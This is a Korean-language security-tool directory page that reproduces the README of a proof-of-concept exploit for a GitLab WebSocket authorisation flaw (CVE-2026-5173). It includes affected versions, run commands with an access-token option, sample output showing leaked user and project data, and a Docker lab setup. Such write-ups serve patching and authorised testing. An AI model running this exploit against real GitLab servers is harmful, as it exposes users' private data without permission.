Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-5173 — CVE-2026-5173 | Kitploit
도구/GitHubGitHub/0xblackash/cve-2026-5173
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHub0xblackash/cve-2026-5173

CVE-2026-5173

CVE-2026-5173

저장소 보기
115개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🦊 CVE-2026-5173: GitLab WebSocket 무단 메서드 실행 PoC

Linux Vulnerability (5) (1)

CVE Badge PoC Affected Versions Python

GitHub stars License


🛠️ 개요

CVE-2026-5173은 낮은 권한의 인증된 공격자가 GitLab의 WebSocket(/-/cable) 엔드포인트, 특히 GraphqlChannel을 통해 제한된 백엔드 메서드를 호출할 수 있게 합니다.

이로 인해 민감한 데이터 노출(높은 기밀성) 및 제한된 무단 작업이 발생할 수 있습니다.

영향을 받는 버전

  • GitLab CE/EE: 16.9.6 ~ 18.8.8
  • 18.9 ~ 18.9.5 미만
  • 18.10 ~ 18.10.3 미만

패치 적용 버전: 18.8.9 • 18.9.5 • 18.10.3


⚡ 기능

  • 깔끔하고 현대적인 Python 3 PoC
  • 한 줄 명령으로 간편하게 실행: python3 CVE-2026-5173.py http://target:8080
  • 자동 WebSocket 연결 + GraphqlChannel 구독
  • 다중 메서드 열거 (currentUser, users, projects 등)
  • Personal Access Token 지원
  • 보기 좋은 컬러 출력
  • 승인된 랩/펜테스트 용도로만 안전하게 사용 가능

🚀 빠른 시작

1. 저장소 클론

git clone https://github.com/0xBlackash/CVE-2026-5173.git
cd CVE-2026-5173

2. PoC 실행

python3 CVE-2026-5173.py http://your-gitlab-lab:8080

토큰 사용 (권장):

python3 CVE-2026-5173.py http://target.com:8080 -t glpat-XXXXXXXXXXXXXXXXXXXX

📸 스크린샷

성공 출력 예시:

[+] CVE-2026-5173 PoC v2 - Target: http://192.168.1.100:8080
[+] WebSocket connected
[+] Subscribed to GraphqlChannel
[*] Testing method: currentUser
[SUCCESS] Possible unauthorized access via 'currentUser'!
    → Response: {"result":{"data":{"currentUser":{"id":"gid://gitlab/User/123","name":"Normal User","email":"[email protected]"}}}...

[*] Testing method: users
[SUCCESS] Possible unauthorized access via 'users'!
    → Response: {"result":{"data":{"users":{"nodes":[ {"id":"gid://gitlab/User/1","name":"Admin","email":"[email protected]"}, ... ]}}}  ← This leaks all users including admins!

[*] Testing method: projects
[SUCCESS] Possible unauthorized access via 'projects'!
    → Response: long list of ALL projects (even private ones you shouldn't see)

📋 사용법

python3 CVE-2026-5173.py <target> [options]

Arguments:
  target                Target URL (e.g. http://gitlab.example.com:8080)
  -t, --token           GitLab Personal Access Token (API scope)
  -h, --help            Show this help message

🧪 랩 환경 구성 (권장)

docker run -d --name gitlab-vuln \
  -p 8080:80 -p 2222:22 \
  gitlab/gitlab-ce:18.10.2-ce.0

그런 다음 일반 사용자를 생성하고 PoC를 실행하세요.


⚠️ 법적 고지 및 면책 조항

  • 이 PoC는 교육 및 승인된 테스트 목적으로만 사용됩니다.
  • 소유하거나 테스트에 대한 명시적 허가를 받은 시스템에서만 사용하세요.
  • 무단 사용은 불법이며 법률에 위배됩니다.
  • 오용에 대한 책임은 지지 않습니다.

📚 참고 자료

  • GitLab 공식 패치 릴리스: https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
  • CVE 기록: https://www.cve.org/CVERecord?id=CVE-2026-5173
  • GitHub 보안 권고: https://github.com/advisories/GHSA-5gj7-3j23-w2h2

보안 커뮤니티를 위해 ❤️로 제작됨
유용했다면 저장소에 ⭐ 스타를 눌러주세요!

면책 고지: 제작 당시 공개된 상세 익스플로잇은 없었습니다. 이는 연구용 PoC입니다.

도구 다운로드